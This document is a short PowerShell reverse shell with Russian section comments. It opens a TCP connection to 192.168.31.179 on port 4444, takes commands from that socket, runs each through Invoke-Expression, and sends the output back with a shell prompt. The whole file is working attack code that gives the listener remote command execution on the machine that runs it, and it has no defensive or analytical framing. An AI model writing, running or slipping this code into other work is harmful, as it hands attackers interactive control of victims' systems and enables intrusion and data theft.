# Часть 1 - создание клиента
$c = New-Object Net.Sockets.TCPClient('192.168.31.179',4444)
$s = $c.GetStream()

# Часть 2 - работа с потоком
[byte[]]$b=0..65535|%{0}
while(($i=$s.Read($b,0,$b.Length)) -ne 0){
    $d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i)
    
    # Часть 3 - выполнение команд
    $sb=(iex $d 2>&1|Out-String)
    $sb2=$sb+'PS '+(pwd).Path+'> '
    
    # Часть 4 - отправка ответа
    $s.Write(([text.encoding]::ASCII).GetBytes($sb2),0,$sb2.Length)
    $s.Flush()
}

# Часть 5 - закрытие
$c.Close()
